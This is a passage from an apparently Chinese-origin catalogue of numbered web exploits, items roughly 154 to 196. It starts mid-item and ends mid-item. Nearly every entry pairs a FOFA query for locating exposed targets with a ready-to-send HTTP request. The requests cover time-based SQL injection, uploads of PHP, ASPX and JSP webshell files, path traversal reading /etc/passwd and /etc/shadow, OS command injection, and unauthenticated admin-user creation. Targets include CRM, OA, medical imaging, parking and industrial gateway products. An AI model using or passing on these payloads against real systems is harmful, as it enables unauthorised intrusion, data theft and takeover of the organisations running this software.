FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. LyLme Spage (六零导航页) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Access the echoed file: http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS Command Injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. 美特CRM upload.jsp Arbitrary File Upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL Injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. 英飞达 (INFINITT) Medical Image Archiving and Communication System WebJobUpload Arbitrary File Upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PAYLOAD</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 Directory Traversal and File Read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓 Intelligent Parking Fee Collection System Webservice.asmx Arbitrary File Upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field sets the file name and the <fileFlow> field carries the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

http://x.x.x.x/dizxdell.aspx

162. 和丰 Multimedia Information Publishing System QH.aspx Arbitrary File Upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团 Distribution Management System ue_serve.php Arbitrary File Upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园 (安校易) Management System FileUpProductupdate.aspx Arbitrary File Upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL Injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL: https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信 Ticketing Management Platform SeatMapHandler SQL Injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. 精益价值管理系统 (Lean Value Management System) DownLoad.aspx Arbitrary File Read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景EHR OutputCode Arbitrary File Read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. 宏景EHR downlawbase SQL Injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. 宏景EHR DisplayExcelCustomReport Arbitrary File Read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星 CMSV6 Vehicle Positioning and Monitoring Platform SQL Injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT HD License Plate Recognition Camera Arbitrary File Read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point Security Gateway Arbitrary File Read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. 金和OA C6 FileDownLoad.aspx Arbitrary File Read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和OA C6 IncentivePlanFulfill.aspx SQL Injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. Telecom Gateway Configuration Management System rewrite.php File Upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C Router Sensitive Information Disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C Campus Network Self-Service System flexfileupload Arbitrary File Upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

GET /imc/primepush/%2e%2e/flex/12234.txt

179. 建文 Engineering Management System Arbitrary File Read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL Injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申信息科技 Enterprise Standardization Management System UpdataLogHandler.ashx SQL Injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申科技 Enterprise Standardization Management System AddNewsHandler.ashx Arbitrary User Creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创 Library Cluster Management System updOpuserPw SQL Injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. 迅饶科技 X2Modbus Gateway AddUser Arbitrary User Addition
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. 瑞友天翼 Application Virtualization System SQL Injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL Injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation systems.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL Injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体-佳会 Video Conferencing attachment Arbitrary File Read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技 (LANWON) clinical browsing system deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. 短视频矩阵营销系统 (short-video matrix marketing system) poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. 亿赛通 electronic document security management system NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. 富通天下 foreign-trade ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    { get { return true; } }
    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}

193. 山石网科 (Hillstone) 云鉴 security management system setsystemtimeaction command execution
FOFA:body="山石云鉴主机安全管理系统"
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the vulnerability is present.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. 飞鱼星 internet behavior management system send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. 河南省风速科技 unified authentication platform password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
